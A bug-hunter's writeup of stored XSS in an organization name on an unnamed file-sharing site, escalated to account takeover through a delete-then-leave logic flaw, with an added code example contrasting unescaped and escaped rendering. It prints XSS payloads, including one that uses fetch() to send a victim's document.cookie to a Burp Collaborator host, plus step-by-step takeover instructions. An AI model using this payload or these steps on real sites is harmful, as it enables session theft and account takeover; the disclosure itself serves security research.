How I turned a Self-XSS into one-click Account Takeover through Bad Business Logic

Tushar Sharma

Hello folks,

This is my first writeup and I wanted it to be special, so I decided to write it about one of my most interesting finds. Please ignore my mistakes. Let's start!

As the target application does not have a bug bounty program and the company does not want me to disclose its name (they don't want to invite traffic), I will refer to it as target.com.

About Target: It is a file-sharing application where a user can share files with anyone and create or join organizations and teams. There is also functionality to create an organization and add team members by entering their emails. The team members are automatically added to the organization without accepting an invite, and you can share files there (weird…??)

About Vulnerability: The vulnerability is a Stored XSS that can steal any user's cookies. The severity of this vulnerability is quite high because I can take over any account on the website that I want, and although one click is required from the user, I also made that click inevitable due to the application's bad business logic.

How I exploited the vulnerability: I usually test the main app functionality while I do recon in the background. I quickly signed up for an account and tested for email verification bypass, open redirection, and similar bugs. I usually don't test for XSS, but I put this payload ['"><img src=x onerror=alert(1)>] everywhere I can, to see how the website responds. When I put this payload in the organization name it triggered and I got the beautiful popup. The first thing that came to my mind was to add another user and try to alert their cookies.

I made another organization with the payload ['"><img src=x onerror=alert(document.cookie)>] and invited the 2nd user to alert the cookies. Now when I opened the organization with the 2nd account nothing happened; the payload was just filtered and properly encoded. I started putting many other payloads in the org name field and attempted every action the invited user can perform on the organization, but nothing executed the payload.

As I said, I don't give much time to XSS, so I moved on to testing for IDORs and privilege escalation issues, and after 2 hours of hunting I only found a session management issue and a missing rate limit.

I finally decided to go back to testing the XSS, because it's not every day you get a popup. So again I invited the second user to an org whose name contained the payload. Now, as the admin (1st account), I deleted the organization and it was deleted; then I navigated to the member account (2nd) and there the organization was not deleted. So I tried to leave the organization, and the payload fired with an error.

This error occurred because the organization was deleted by the admin, but according to the application's business logic the member is given time to back up the files and cannot leave the organization for 2 days. This error message was vulnerable, and my payload was executed.
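The pattern described here, an organization name that is encoded on the normal page but reflected raw by the "cannot leave yet" error, as an added illustration that is not the target application's code. All function and field names (escapeHtml, renderOrgView, renderLeaveError*, org.name) are assumptions for the example.

```javascript
// Added example (not the target application's code): contrasts the two render
// paths the writeup describes. The organization view encodes the name; the
// error shown inside the 2-day backup window concatenates it unencoded.

// Minimal HTML escaping, safe for text nodes and quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The path that was already safe: the organization page encodes the name.
function renderOrgView(org) {
  return `<h1>Organization: ${escapeHtml(org.name)}</h1>`;
}

// The vulnerable path: the error a member sees when trying to leave an
// organization the admin has deleted (members get 2 days to back up files).
function renderLeaveErrorVulnerable(org) {
  return `<div class="error">You cannot leave "${org.name}" yet: ` +
         `the owner deleted it and members have 2 days to back up files.</div>`;
}

// The fix: the same encoder on every path that reflects the name, including
// error messages, which are easy to forget in a code review.
function renderLeaveErrorSafe(org) {
  return `<div class="error">You cannot leave "${escapeHtml(org.name)}" yet: ` +
         `the owner deleted it and members have 2 days to back up files.</div>`;
}

// Review/test helper: does an <img> tag from the untrusted name survive
// into the rendered HTML unencoded?
function containsUnescapedImg(html) {
  return /<img\b/i.test(html);
}

// Constructed sample input: the payload from the writeup used as an org name.
const sampleOrg = { name: `'"><img src=x onerror=alert(1)>` };

console.log(renderLeaveErrorVulnerable(sampleOrg)); // tag reaches the browser
console.log(renderLeaveErrorSafe(sampleOrg));       // rendered as inert text
```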

Now I took help from my friend Shreyas Koli and built a payload:

'"><img src=x onerror=fetch('//ra54f7ltuq8q8i7ym90odj9zgqmga5.burpcollaborator.net/?c='%2Bdocument.cookie)>

Now the final steps: as the attacker, I create an organization with the malicious payload.

You can create several organizations to force the user to try to leave at least one of them.

Organization created. As the admin/attacker, delete the organization.

Now the victim will see that he no longer belongs to the organization and will try to leave. As soon as he clicks the Leave button his cookies are alerted and sent to my Burp link.

I made a good report and sent it to the security team, and got a reply from them.